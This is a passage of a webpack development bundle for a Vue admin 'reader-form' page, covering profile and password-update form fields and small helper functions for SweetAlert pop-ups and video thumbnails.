staticClass: \"form-group row  col-md-4 mx-auto mt-3\" }, [\n            _vm.isUpdating\n              ? _c(\"div\", { staticClass: \"col-md-6 px-0 pr-lg-1\" }, [\n                  _c(\n                    \"button\",\n                    {\n                      staticClass: \"btn btn-secondary w-100\",\n                      attrs: { type: \"button\" },\n                      on: {\n                        click: function($event) {\n                          $event.preventDefault()\n                          return _vm.cancelUpdate()\n                        }\n                      }\n                    },\n                    [_vm._v(\"\\n          Cancel\\n          \")]\n                  )\n                ])\n              : _c(\"div\", { staticClass: \"col-md-6 px-0 pr-lg-1\" }, [\n                  _c(\n                    \"button\",\n                    {\n                      staticClass: \"btn btn-danger w-100\",\n                      attrs: { type: \"button\" },\n                      on: {\n                        click: function($event) {\n                          $event.preventDefault()\n                          return _vm.removeAccount()\n                        }\n                      }\n                    },\n                    [_vm._v(\"\\n          Remove Account\\n          \")]\n                  )\n                ]),\n            _vm._v(\" \"),\n            _c(\n              \"div\",\n              { staticClass: \"col-md-6 px-0 pl-lg-1 ml-md-auto\" },\n              [\n                !_vm.isUpdating\n                  ? 
_c(\n                      \"button\",\n                      {\n                        staticClass: \"btn btn-primary w-100\",\n                        on: {\n                          click: function($event) {\n                            $event.preventDefault()\n                            _vm.isUpdating = true\n                          }\n                        }\n                      },\n                      [\n                        _vm._v(\n                          \"\\n            \" +\n                            _vm._s(_vm.$t(\"update\")) +\n                            \"\\n          \"\n                        )\n                      ]\n                    )\n                  : _c(\"v-button\", { staticClass: \"btn btn-primary w-100\" }, [\n                      _vm._v(\"\\n            Confirm\\n          \")\n                    ])\n              ],\n              1\n            )\n          ])\n        ])\n      ]\n    ),\n    _vm._v(\" \"),\n    _c(\"hr\", { staticClass: \" mt-5\" }),\n    _vm._v(\" \"),\n    _c(\"h5\", { staticClass: \"mb-3\" }, [_vm._v(\"Additional Information\")]),\n    _vm._v(\" \"),\n    _c(\n      \"form\",\n      {\n        on: {\n          submit: function($event) {\n            $event.preventDefault()\n            return _vm.updateAdditional($event)\n          },\n          keydown: function($event) {\n            return _vm.additionalForm.onKeydown($event)\n          }\n        }\n      },\n      [\n        _c(\"div\", { staticClass: \"row\" }, [\n          _c(\"div\", { staticClass: \"col-md-6\" }, [\n            _c(\n              \"div\",\n              { staticClass: \"form-group col-md-11 mx-auto\" },\n              [\n                _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"Address\")))]),\n                _vm._v(\" \"),\n                _c(\"input\", {\n                  directives: [\n                    {\n                      name: \"model\",\n                      rawName: \"v-model\",\n                     
 value: _vm.additionalForm.address,\n                      expression: \"additionalForm.address\"\n                    }\n                  ],\n                  staticClass: \"form-control\",\n                  class: {\n                    \"is-invalid\": _vm.additionalForm.errors.has(\"address\")\n                  },\n                  attrs: {\n                    type: \"text\",\n                    name: \"address\",\n                    readonly: !_vm.isAdditionalUpdating\n                  },\n                  domProps: { value: _vm.additionalForm.address },\n                  on: {\n                    input: function($event) {\n                      if ($event.target.composing) {\n                        return\n                      }\n                      _vm.$set(\n                        _vm.additionalForm,\n                        \"address\",\n                        $event.target.value\n                      )\n                    }\n                  }\n                }),\n                _vm._v(\" \"),\n                _c(\"has-error\", {\n                  attrs: { form: _vm.additionalForm, field: \"address1\" }\n                })\n              ],\n              1\n            ),\n            _vm._v(\" \"),\n            _c(\n              \"div\",\n              { staticClass: \"form-group col-md-11 mx-auto mx-auto  \" },\n              [\n                _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"State/Province\")))]),\n                _vm._v(\" \"),\n                _c(\"input\", {\n                  directives: [\n                    {\n                      name: \"model\",\n                      rawName: \"v-model\",\n                      value: _vm.additionalForm.state,\n                      expression: \"additionalForm.state\"\n                    }\n                  ],\n                  staticClass: \"form-control\",\n                  class: {\n                    \"is-invalid\": _vm.additionalForm.errors.has(\"state\")\n           
       },\n                  attrs: {\n                    type: \"text\",\n                    name: \"state\",\n                    readonly: !_vm.isAdditionalUpdating\n                  },\n                  domProps: { value: _vm.additionalForm.state },\n                  on: {\n                    input: function($event) {\n                      if ($event.target.composing) {\n                        return\n                      }\n                      _vm.$set(_vm.additionalForm, \"state\", $event.target.value)\n                    }\n                  }\n                }),\n                _vm._v(\" \"),\n                _c(\"has-error\", {\n                  attrs: { form: _vm.additionalForm, field: \"state\" }\n                })\n              ],\n              1\n            ),\n            _vm._v(\" \"),\n            _c(\n              \"div\",\n              { staticClass: \"form-group col-md-11 mx-auto mx-auto  \" },\n              [\n                _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"ZIP/Postal Code\")))]),\n                _vm._v(\" \"),\n                _c(\"input\", {\n                  directives: [\n                    {\n                      name: \"model\",\n                      rawName: \"v-model\",\n                      value: _vm.additionalForm.zip,\n                      expression: \"additionalForm.zip\"\n                    }\n                  ],\n                  staticClass: \"form-control\",\n                  class: { \"is-invalid\": _vm.additionalForm.errors.has(\"zip\") },\n                  attrs: {\n                    type: \"text\",\n                    name: \"zip\",\n                    readonly: !_vm.isAdditionalUpdating\n                  },\n                  domProps: { value: _vm.additionalForm.zip },\n                  on: {\n                    input: function($event) {\n                      if ($event.target.composing) {\n                        return\n                      }\n                      
_vm.$set(_vm.additionalForm, \"zip\", $event.target.value)\n                    }\n                  }\n                }),\n                _vm._v(\" \"),\n                _c(\"has-error\", {\n                  attrs: { form: _vm.additionalForm, field: \"zip\" }\n                })\n              ],\n              1\n            )\n          ]),\n          _vm._v(\" \"),\n          _c(\"div\", { staticClass: \"col-md-6\" }, [\n            _c(\n              \"div\",\n              { staticClass: \"form-group col-md-11 mx-auto mx-auto  \" },\n              [\n                _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"Country\")))]),\n                _vm._v(\" \"),\n                _c(\"input\", {\n                  directives: [\n                    {\n                      name: \"model\",\n                      rawName: \"v-model\",\n                      value: _vm.additionalForm.country,\n                      expression: \"additionalForm.country\"\n                    }\n                  ],\n                  staticClass: \"form-control\",\n                  class: {\n                    \"is-invalid\": _vm.additionalForm.errors.has(\"country\")\n                  },\n                  attrs: {\n                    type: \"text\",\n                    name: \"country\",\n                    readonly: !_vm.isAdditionalUpdating\n                  },\n                  domProps: { value: _vm.additionalForm.country },\n                  on: {\n                    input: function($event) {\n                      if ($event.target.composing) {\n                        return\n                      }\n                      _vm.$set(\n                        _vm.additionalForm,\n                        \"country\",\n                        $event.target.value\n                      )\n                    }\n                  }\n                }),\n                _vm._v(\" \"),\n                _c(\"has-error\", {\n                  attrs: { form: _vm.additionalForm, 
field: \"country\" }\n                })\n              ],\n              1\n            ),\n            _vm._v(\" \"),\n            _c(\n              \"div\",\n              { staticClass: \"form-group col-md-11 mx-auto\" },\n              [\n                _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"Birthdate\")))]),\n                _vm._v(\" \"),\n                _c(\"birth-datepicker\", {\n                  staticClass: \"form-control\",\n                  class: {\n                    \"is-invalid\": _vm.additionalForm.errors.has(\"birthdate\")\n                  },\n                  attrs: {\n                    name: \"birthdate\",\n                    disabled: !_vm.isAdditionalUpdating\n                  },\n                  model: {\n                    value: _vm.additionalForm.birthdate,\n                    callback: function($$v) {\n                      _vm.$set(_vm.additionalForm, \"birthdate\", $$v)\n                    },\n                    expression: \"additionalForm.birthdate\"\n                  }\n                }),\n                _vm._v(\" \"),\n                _c(\"has-error\", {\n                  attrs: { form: _vm.additionalform, field: \"birthdate\" }\n                })\n              ],\n              1\n            ),\n            _vm._v(\" \"),\n            _c(\n              \"div\",\n              { staticClass: \"form-group col-md-11 mx-auto\" },\n              [\n                _c(\"label\", [_vm._v(\"Gender\")]),\n                _vm._v(\" \"),\n                _c(\n                  \"select\",\n                  {\n                    directives: [\n                      {\n                        name: \"model\",\n                        rawName: \"v-model\",\n                        value: _vm.additionalForm.gender,\n                        expression: \"additionalForm.gender\"\n                      }\n                    ],\n                    staticClass: \"form-control\",\n                    attrs: {\n            
          id: \"gender\",\n                      required: \"\",\n                      disabled: !_vm.isAdditionalUpdating\n                    },\n                    on: {\n                      change: function($event) {\n                        var $$selectedVal = Array.prototype.filter\n                          .call($event.target.options, function(o) {\n                            return o.selected\n                          })\n                          .map(function(o) {\n                            var val = \"_value\" in o ? o._value : o.value\n                            return val\n                          })\n                        _vm.$set(\n                          _vm.additionalForm,\n                          \"gender\",\n                          $event.target.multiple\n                            ? $$selectedVal\n                            : $$selectedVal[0]\n                        )\n                      }\n                    }\n                  },\n                  _vm._l(_vm.genders, function(gender) {\n                    return _c(\n                      \"option\",\n                      { key: gender.id, domProps: { value: gender.id } },\n                      [\n                        _vm._v(\n                          \"\\n              \" +\n                            _vm._s(gender.name) +\n                            \"\\n            \"\n                        )\n                      ]\n                    )\n                  }),\n                  0\n                ),\n                _vm._v(\" \"),\n                _c(\"has-error\", {\n                  attrs: { form: _vm.additionalForm, field: \"gender\" }\n                })\n              ],\n              1\n            )\n          ]),\n          _vm._v(\" \"),\n          _vm.isAdditionalUpdating\n            ? 
_c(\n                \"div\",\n                { staticClass: \"form-group row  col-md-4 mx-auto mt-3\" },\n                [\n                  _c(\"div\", { staticClass: \"col-md-6 px-0 pr-lg-1\" }, [\n                    _c(\n                      \"button\",\n                      {\n                        staticClass: \"btn btn-secondary w-100\",\n                        attrs: { type: \"button\" },\n                        on: {\n                          click: function($event) {\n                            $event.preventDefault()\n                            return _vm.cancelUpdate()\n                          }\n                        }\n                      },\n                      [_vm._v(\"\\n          Cancel\\n          \")]\n                    )\n                  ]),\n                  _vm._v(\" \"),\n                  _c(\n                    \"div\",\n                    { staticClass: \"col-md-6 px-0 pl-lg-1 ml-md-auto\" },\n                    [\n                      _c(\"v-button\", { staticClass: \"btn btn-primary w-100\" }, [\n                        _vm._v(\"\\n            Confirm\\n          \")\n                      ])\n                    ],\n                    1\n                  )\n                ]\n              )\n            : _c(\n                \"div\",\n                { staticClass: \"form-group row  col-md-4 mx-auto mt-3\" },\n                [\n                  _c(\"div\", { staticClass: \"col-md-6 px-0 pr-lg-1\" }, [\n                    _c(\n                      \"button\",\n                      {\n                        staticClass: \"btn btn-secondary w-100\",\n                        attrs: { type: \"button\" },\n                        on: {\n                          click: function($event) {\n                            $event.preventDefault()\n                            return _vm.cancelUpdate()\n                          }\n                        }\n                      },\n                      
[_vm._v(\"\\n          Cancel\\n          \")]\n                    )\n                  ]),\n                  _vm._v(\" \"),\n                  _c(\n                    \"div\",\n                    { staticClass: \"col-md-6 px-0 pl-lg-1 ml-md-auto\" },\n                    [\n                      _c(\"v-button\", { staticClass: \"btn btn-primary w-100\" }, [\n                        _vm._v(\"\\n            Confirm\\n          \")\n                      ])\n                    ],\n                    1\n                  )\n                ]\n              )\n        ])\n      ]\n    ),\n    _vm._v(\" \"),\n    _c(\"hr\", { staticClass: \" mt-5\" }),\n    _vm._v(\" \"),\n    _c(\"h5\", { staticClass: \"mb-3\" }, [_vm._v(\"Update Password\")]),\n    _vm._v(\" \"),\n    _c(\n      \"form\",\n      {\n        on: {\n          submit: function($event) {\n            $event.preventDefault()\n            return _vm.update($event)\n          },\n          keydown: function($event) {\n            return _vm.readerForm.onKeydown($event)\n          }\n        }\n      },\n      [\n        _c(\"div\", { staticClass: \"row\" }, [\n          _c(\"div\", { staticClass: \"col-md-6\" }, [\n            _c(\n              \"div\",\n              { staticClass: \"form-group col-md-11 mx-auto mx-auto  \" },\n              [\n                _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"password\")))]),\n                _vm._v(\" \"),\n                _c(\"input\", {\n                  directives: [\n                    {\n                      name: \"model\",\n                      rawName: \"v-model\",\n                      value: _vm.readerForm.password,\n                      expression: \"readerForm.password\"\n                    }\n                  ],\n                  staticClass: \"form-control\",\n                  class: {\n                    \"is-invalid\": _vm.readerForm.errors.has(\"password\")\n                  },\n                  attrs: {\n                    type: 
\"password\",\n                    name: \"password\",\n                    readonly: !_vm.isUpdating\n                  },\n                  domProps: { value: _vm.readerForm.password },\n                  on: {\n                    input: function($event) {\n                      if ($event.target.composing) {\n                        return\n                      }\n                      _vm.$set(_vm.readerForm, \"password\", $event.target.value)\n                    }\n                  }\n                }),\n                _vm._v(\" \"),\n                _c(\"has-error\", {\n                  attrs: { form: _vm.readerForm, field: \"password\" }\n                })\n              ],\n              1\n            ),\n            _vm._v(\" \"),\n            _c(\n              \"div\",\n              { staticClass: \"form-group col-md-11 mx-auto mx-auto  \" },\n              [\n                _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"Confirm Password\")))]),\n                _vm._v(\" \"),\n                _c(\"input\", {\n                  staticClass: \"form-control\",\n                  class: {\n                    \"is-invalid\": _vm.readerForm.errors.has(\"confirm-password\")\n                  },\n                  attrs: {\n                    type: \"password\",\n                    name: \"confirmPassword\",\n                    readonly: !_vm.isUpdating\n                  }\n                }),\n                _vm._v(\" \"),\n                _c(\"has-error\", {\n                  attrs: { form: _vm.readerForm, field: \"confirmPassword\" }\n                })\n              ],\n              1\n            )\n          ]),\n          _vm._v(\" \"),\n          _c(\"div\", { staticClass: \"col-md-6\" }, [\n            _c(\n              \"div\",\n              { staticClass: \"form-group col-md-11 mx-auto mx-auto  \" },\n              [\n                _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"Current Password\")))]),\n                _vm._v(\" \"),\n        
        _c(\"input\", {\n                  staticClass: \"form-control\",\n                  class: {\n                    \"is-invalid\": _vm.readerForm.errors.has(\"current-password\")\n                  },\n                  attrs: {\n                    type: \"password\",\n                    name: \"currentPassword\",\n                    readonly: !_vm.isUpdating\n                  }\n                }),\n                _vm._v(\" \"),\n                _c(\"has-error\", {\n                  attrs: { form: _vm.readerForm, field: \"currentPassword\" }\n                })\n              ],\n              1\n            )\n          ]),\n          _vm._v(\" \"),\n          _c(\"div\", { staticClass: \"form-group row col-md-4 mx-auto mt-3\" }, [\n            _vm.isUpdating\n              ? _c(\"div\", { staticClass: \"col-md-6 px-0 pr-lg-1\" }, [\n                  _c(\n                    \"button\",\n                    {\n                      staticClass: \"btn btn-secondary w-100\",\n                      attrs: { type: \"button\" },\n                      on: {\n                        click: function($event) {\n                          $event.preventDefault()\n                          return _vm.cancelUpdate()\n                        }\n                      }\n                    },\n                    [_vm._v(\"\\n          Cancel\\n          \")]\n                  )\n                ])\n              : _c(\"div\", { staticClass: \"col-md-6 px-0 pr-lg-1\" }, [\n                  _c(\n                    \"button\",\n                    {\n                      staticClass: \"btn btn-danger w-100\",\n                      attrs: { type: \"button\" },\n                      on: {\n                        click: function($event) {\n                          $event.preventDefault()\n                          return _vm.removeAccount()\n                        }\n                      }\n                    },\n                    [_vm._v(\"\\n          
Remove Account\\n          \")]\n                  )\n                ]),\n            _vm._v(\" \"),\n            _c(\n              \"div\",\n              { staticClass: \"col-md-6 px-0 pl-lg-1 ml-md-auto\" },\n              [\n                !_vm.isUpdating\n                  ? _c(\n                      \"button\",\n                      {\n                        staticClass: \"btn btn-primary w-100\",\n                        on: {\n                          click: function($event) {\n                            $event.preventDefault()\n                            _vm.isUpdating = true\n                          }\n                        }\n                      },\n                      [\n                        _vm._v(\n                          \"\\n          \" +\n                            _vm._s(_vm.$t(\"update\")) +\n                            \"\\n          \"\n                        )\n                      ]\n                    )\n                  : _c(\"v-button\", { staticClass: \"btn btn-primary w-100\" }, [\n                      _vm._v(\"\\n          Confirm\\n          \")\n                    ])\n              ],\n              1\n            )\n          ])\n        ])\n      ]\n    )\n  ])\n}\nvar staticRenderFns = []\nrender._withStripped = true\n\nexport { render, staticRenderFns }"],"sourceRoot":""}\n//# sourceURL=webpack-internal:///./node_modules/vue-loader/lib/loaders/templateLoader.js?!./node_modules/vue-loader/lib/index.js?!./resources/js/pages/admin/reader/reader-form.vue?vue&type=template&id=14c15a6b&\n");
/***/ }),
/***/ "./resources/js/helpers/index.js":
/*!***************************************!*\
!*** ./resources/js/helpers/index.js ***!
\***************************************/
/*! exports provided: swalOops, swalSuccess, createObjectURL, videoToBlob, blobVideoToBlobThumbnail */
/***/ (function(module, __webpack_exports__, __webpack_require__) {
"use strict";
eval("__webpack_require__.r(__webpack_exports__);\n/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, \"swalOops\", function() { return swalOops; });\n/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, \"swalSuccess\", function() { return swalSuccess; });\n/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, \"createObjectURL\", function() { return createObjectURL; });\n/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, \"videoToBlob\", function() { return videoToBlob; });\n/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, \"blobVideoToBlobThumbnail\", function() { return blobVideoToBlobThumbnail; });\n/* harmony import */ var _babel_runtime_regenerator__WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(/*! @babel/runtime/regenerator */ \"./node_modules/@babel/runtime/regenerator/index.js\");\n/* harmony import */ var _babel_runtime_regenerator__WEBPACK_IMPORTED_MODULE_0___default = /*#__PURE__*/__webpack_require__.n(_babel_runtime_regenerator__WEBPACK_IMPORTED_MODULE_0__);\n/* harmony import */ var sweetalert2__WEBPACK_IMPORTED_MODULE_1__ = __webpack_require__(/*! sweetalert2 */ \"./node_modules/sweetalert2/dist/sweetalert2.all.js\");\n/* harmony import */ var sweetalert2__WEBPACK_IMPORTED_MODULE_1___default = /*#__PURE__*/__webpack_require__.n(sweetalert2__WEBPACK_IMPORTED_MODULE_1__);\n/* harmony import */ var video_metadata_thumbnails__WEBPACK_IMPORTED_MODULE_2__ = __webpack_require__(/*! 
video-metadata-thumbnails */ \"./node_modules/video-metadata-thumbnails/lib/video-metadata-thumbnails.es.js\");\n\n\nfunction asyncGeneratorStep(gen, resolve, reject, _next, _throw, key, arg) { try { var info = gen[key](arg); var value = info.value; } catch (error) { reject(error); return; } if (info.done) { resolve(value); } else { Promise.resolve(value).then(_next, _throw); } }\n\nfunction _asyncToGenerator(fn) { return function () { var self = this, args = arguments; return new Promise(function (resolve, reject) { var gen = fn.apply(self, args); function _next(value) { asyncGeneratorStep(gen, resolve, reject, _next, _throw, \"next\", value); } function _throw(err) { asyncGeneratorStep(gen, resolve, reject, _next, _throw, \"throw\", err); } _next(undefined); }); }; }\n\n\n\nvar swalOops = function swalOops() {\n var message = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : 'Something went wrong!';\n return sweetalert2__WEBPACK_IMPORTED_MODULE_1___default.a.fire({\n title: \"Oops!\",\n text: message,\n icon: \"error\"\n });\n};\nvar swalSuccess = function swalSuccess() {\n var message = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : 'Action successfuly finished!';\n return sweetalert2__WEBPACK_IMPORTED_MODULE_1___default.a.fire({\n title: \"Success!\",\n text: message,\n icon: \"success\"\n });\n};\nvar createObjectURL = function createObjectURL(object) {\n // convert video url to blob\n return window.URL ? 
window.URL.createObjectURL(object) : window.webkitURL.createObjectURL(object);\n};\nvar videoToBlob = /*#__PURE__*/function () {\n var _ref = _asyncToGenerator( /*#__PURE__*/_babel_runtime_regenerator__WEBPACK_IMPORTED_MODULE_0___default.a.mark(function _callee(videoStream) {\n return _babel_runtime_regenerator__WEBPACK_IMPORTED_MODULE_0___default.a.wrap(function _callee$(_context) {\n while (1) {\n switch (_context.prev = _context.next) {\n case 0:\n _context.next = 2;\n return fetch(videoStream).then(function (r) {\n return r.blob();\n });\n\n case 2:\n return _context.abrupt(\"return\", _context.sent);\n\n case 3:\n case \"end\":\n return _context.stop();\n }\n }\n }, _callee);\n }));\n\n return function videoToBlob(_x) {\n return _ref.apply(this, arguments);\n };\n}();\nvar blobVideoToBlobThumbnail = /*#__PURE__*/function () {\n var _ref2 = _asyncToGenerator( /*#__PURE__*/_babel_runtime_regenerator__WEBPACK_IMPORTED_MODULE_0___default.a.mark(function _callee2(blob) {\n var thumbnails;\n return _babel_runtime_regenerator__WEBPACK_IMPORTED_MODULE_0___default.a.wrap(function _callee2$(_context2) {\n while (1) {\n switch (_context2.prev = _context2.next) {\n case 0:\n _context2.next = 2;\n return Object(video_metadata_thumbnails__WEBPACK_IMPORTED_MODULE_2__[\"getThumbnails\"])(blob, {\n interval: 1,\n start: 2,\n end: 3\n });\n\n case 2:\n thumbnails = _context2.sent;\n return _context2.abrupt(\"return\", thumbnails[0]['blob']);\n\n case 4:\n case \"end\":\n return _context2.stop();\n }\n }\n }, _callee2);\n }));\n\n return function blobVideoToBlobThumbnail(_x2) {\n return _ref2.apply(this, arguments);\n };\n}();//# sourceURL=[module]\n//# 
sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjozLCJzb3VyY2VzIjpbIndlYnBhY2s6Ly8vLi9yZXNvdXJjZXMvanMvaGVscGVycy9pbmRleC5qcz9iNzE3Il0sIm5hbWVzIjpbInN3YWxPb3BzIiwibWVzc2FnZSIsIlN3YWwiLCJmaXJlIiwidGl0bGUiLCJ0ZXh0IiwiaWNvbiIsInN3YWxTdWNjZXNzIiwiY3JlYXRlT2JqZWN0VVJMIiwib2JqZWN0Iiwid2luZG93IiwiVVJMIiwid2Via2l0VVJMIiwidmlkZW9Ub0Jsb2IiLCJ2aWRlb1N0cmVhbSIsImZldGNoIiwidGhlbiIsInIiLCJibG9iIiwiYmxvYlZpZGVvVG9CbG9iVGh1bWJuYWlsIiwiZ2V0VGh1bWJuYWlscyIsImludGVydmFsIiwic3RhcnQiLCJlbmQiLCJ0aHVtYm5haWxzIl0sIm1hcHBpbmdzIjoiOzs7Ozs7Ozs7Ozs7Ozs7OztBQUFBO0FBQ0E7QUFFTyxJQUFNQSxRQUFRLEdBQUcsU0FBWEEsUUFBVyxHQUF1QztBQUFBLE1BQXRDQyxPQUFzQyx1RUFBNUIsdUJBQTRCO0FBQzNELFNBQU9DLGtEQUFJLENBQUNDLElBQUwsQ0FBVTtBQUNiQyxTQUFLLEVBQUUsT0FETTtBQUViQyxRQUFJLEVBQUVKLE9BRk87QUFHYkssUUFBSSxFQUFFO0FBSE8sR0FBVixDQUFQO0FBS0gsQ0FOTTtBQVFBLElBQU1DLFdBQVcsR0FBRyxTQUFkQSxXQUFjLEdBQThDO0FBQUEsTUFBN0NOLE9BQTZDLHVFQUFuQyw4QkFBbUM7QUFDckUsU0FBT0Msa0RBQUksQ0FBQ0MsSUFBTCxDQUFVO0FBQ2JDLFNBQUssRUFBRSxVQURNO0FBRWJDLFFBQUksRUFBRUosT0FGTztBQUdiSyxRQUFJLEVBQUU7QUFITyxHQUFWLENBQVA7QUFLSCxDQU5NO0FBUUEsSUFBTUUsZUFBZSxHQUFHLFNBQWxCQSxlQUFrQixDQUFDQyxNQUFELEVBQVk7QUFBRTtBQUN6QyxTQUFRQyxNQUFNLENBQUNDLEdBQVIsR0FBZUQsTUFBTSxDQUFDQyxHQUFQLENBQVdILGVBQVgsQ0FBMkJDLE1BQTNCLENBQWYsR0FBb0RDLE1BQU0sQ0FBQ0UsU0FBUCxDQUFpQkosZUFBakIsQ0FBaUNDLE1BQWpDLENBQTNEO0FBQ0gsQ0FGTTtBQUlBLElBQU1JLFdBQVc7QUFBQSxvSEFBRyxpQkFBT0MsV0FBUDtBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQSxtQkFDVkMsS0FBSyxDQUFDRCxXQUFELENBQUwsQ0FBbUJFLElBQW5CLENBQXdCLFVBQUFDLENBQUM7QUFBQSxxQkFBSUEsQ0FBQyxDQUFDQyxJQUFGLEVBQUo7QUFBQSxhQUF6QixDQURVOztBQUFBO0FBQUE7O0FBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUEsR0FBSDs7QUFBQSxrQkFBWEwsV0FBVztBQUFBO0FBQUE7QUFBQSxHQUFqQjtBQUlBLElBQU1NLHdCQUF3QjtBQUFBLHFIQUFHLGtCQUFPRCxJQUFQO0FBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUEsbUJBQ1hFLCtFQUFhLENBQUNGLElBQUQsRUFBTztBQUN6Q0csc0JBQVEsRUFBRSxDQUQrQjtBQUV6Q0MsbUJBQUssRUFBRSxDQUZrQztBQUd6Q0MsaUJBQUcsRUFBRTtBQUhvQyxhQUFQLENBREY7O0FBQUE7QUFDOUJDLHNCQUQ4QjtBQUFBLDhDQU83QkEsVUFBVSxDQUFD
LENBQUQsQ0FBVixDQUFjLE1BQWQsQ0FQNkI7O0FBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUEsR0FBSDs7QUFBQSxrQkFBeEJMLHdCQUF3QjtBQUFBO0FBQUE7QUFBQSxHQUE5QiIsImZpbGUiOiIuL3Jlc291cmNlcy9qcy9oZWxwZXJzL2luZGV4LmpzLmpzIiwic291cmNlc0NvbnRlbnQiOlsiaW1wb3J0IFN3YWwgZnJvbSAnc3dlZXRhbGVydDInO1xyXG5pbXBvcnQgeyBnZXRNZXRhZGF0YSwgZ2V0VGh1bWJuYWlscyB9IGZyb20gJ3ZpZGVvLW1ldGFkYXRhLXRodW1ibmFpbHMnO1xyXG5cclxuZXhwb3J0IGNvbnN0IHN3YWxPb3BzID0gKG1lc3NhZ2UgPSAnU29tZXRoaW5nIHdlbnQgd3JvbmchJykgPT4ge1xyXG4gICAgcmV0dXJuIFN3YWwuZmlyZSh7XHJcbiAgICAgICAgdGl0bGU6IFwiT29wcyFcIixcclxuICAgICAgICB0ZXh0OiBtZXNzYWdlLFxyXG4gICAgICAgIGljb246IFwiZXJyb3JcIixcclxuICAgICAgfSk7XHJcbn1cclxuXHJcbmV4cG9ydCBjb25zdCBzd2FsU3VjY2VzcyA9IChtZXNzYWdlID0gJ0FjdGlvbiBzdWNjZXNzZnVseSBmaW5pc2hlZCEnKSA9PiB7XHJcbiAgICByZXR1cm4gU3dhbC5maXJlKHtcclxuICAgICAgICB0aXRsZTogXCJTdWNjZXNzIVwiLFxyXG4gICAgICAgIHRleHQ6IG1lc3NhZ2UsXHJcbiAgICAgICAgaWNvbjogXCJzdWNjZXNzXCIsXHJcbiAgICB9KTtcclxufVxyXG5cclxuZXhwb3J0IGNvbnN0IGNyZWF0ZU9iamVjdFVSTCA9IChvYmplY3QpID0+IHsgLy8gY29udmVydCB2aWRlbyB1cmwgdG8gYmxvYlxyXG4gICAgcmV0dXJuICh3aW5kb3cuVVJMKSA/IHdpbmRvdy5VUkwuY3JlYXRlT2JqZWN0VVJMKG9iamVjdCkgOiB3aW5kb3cud2Via2l0VVJMLmNyZWF0ZU9iamVjdFVSTChvYmplY3QpO1xyXG59XHJcblxyXG5leHBvcnQgY29uc3QgdmlkZW9Ub0Jsb2IgPSBhc3luYyAodmlkZW9TdHJlYW0pID0+IHtcclxuICAgIHJldHVybiBhd2FpdCBmZXRjaCh2aWRlb1N0cmVhbSkudGhlbihyID0+IHIuYmxvYigpKVxyXG59XHJcblxyXG5leHBvcnQgY29uc3QgYmxvYlZpZGVvVG9CbG9iVGh1bWJuYWlsID0gYXN5bmMgKGJsb2IpID0+IHtcclxuICAgIGNvbnN0IHRodW1ibmFpbHMgPSBhd2FpdCBnZXRUaHVtYm5haWxzKGJsb2IsIHtcclxuICAgICAgICBpbnRlcnZhbDogMSxcclxuICAgICAgICBzdGFydDogMixcclxuICAgICAgICBlbmQ6IDNcclxuICAgIH0pO1xyXG5cclxuICAgIHJldHVybiB0aHVtYm5haWxzWzBdWydibG9iJ11cclxufSJdLCJzb3VyY2VSb290IjoiIn0=\n//# sourceURL=webpack-internal:///./resources/js/helpers/index.js\n");
/***/ }),
/***/ "./resources/js/pages/admin/reader/reader-form.vue":
/*!*********************************************************!*\
!*** ./resources/js/pages/admin/reader/reader-form.vue ***!
\*********************************************************/
/*! exports provided: default */
/***/ (function(module, __webpack_exports__, __webpack_require__) {
"use strict";
eval("__webpack_require__.r(__webpack_exports__);\n/* harmony import */ var _reader_form_vue_vue_type_template_id_14c15a6b___WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(/*! ./reader-form.vue?vue&type=template&id=14c15a6b& */ \"./resources/js/pages/admin/reader/reader-form.vue?vue&type=template&id=14c15a6b&\");\n/* harmony import */ var _reader_form_vue_vue_type_script_lang_js___WEBPACK_IMPORTED_MODULE_1__ = __webpack_require__(/*! ./reader-form.vue?vue&type=script&lang=js& */ \"./resources/js/pages/admin/reader/reader-form.vue?vue&type=script&lang=js&\");\n/* empty/unused harmony star reexport *//* harmony import */ var _node_modules_vue_loader_lib_runtime_componentNormalizer_js__WEBPACK_IMPORTED_MODULE_2__ = __webpack_require__(/*! ../../../../../node_modules/vue-loader/lib/runtime/componentNormalizer.js */ \"./node_modules/vue-loader/lib/runtime/componentNormalizer.js\");\n\n\n\n\n\n/* normalize component */\n\nvar component = Object(_node_modules_vue_loader_lib_runtime_componentNormalizer_js__WEBPACK_IMPORTED_MODULE_2__[\"default\"])(\n _reader_form_vue_vue_type_script_lang_js___WEBPACK_IMPORTED_MODULE_1__[\"default\"],\n _reader_form_vue_vue_type_template_id_14c15a6b___WEBPACK_IMPORTED_MODULE_0__[\"render\"],\n _reader_form_vue_vue_type_template_id_14c15a6b___WEBPACK_IMPORTED_MODULE_0__[\"staticRenderFns\"],\n false,\n null,\n null,\n null\n \n)\n\n/* hot reload */\nif (false) { var api; }\ncomponent.options.__file = \"resources/js/pages/admin/reader/reader-form.vue\"\n/* harmony default export */ __webpack_exports__[\"default\"] = (component.exports);//# sourceURL=[module]\n//# 
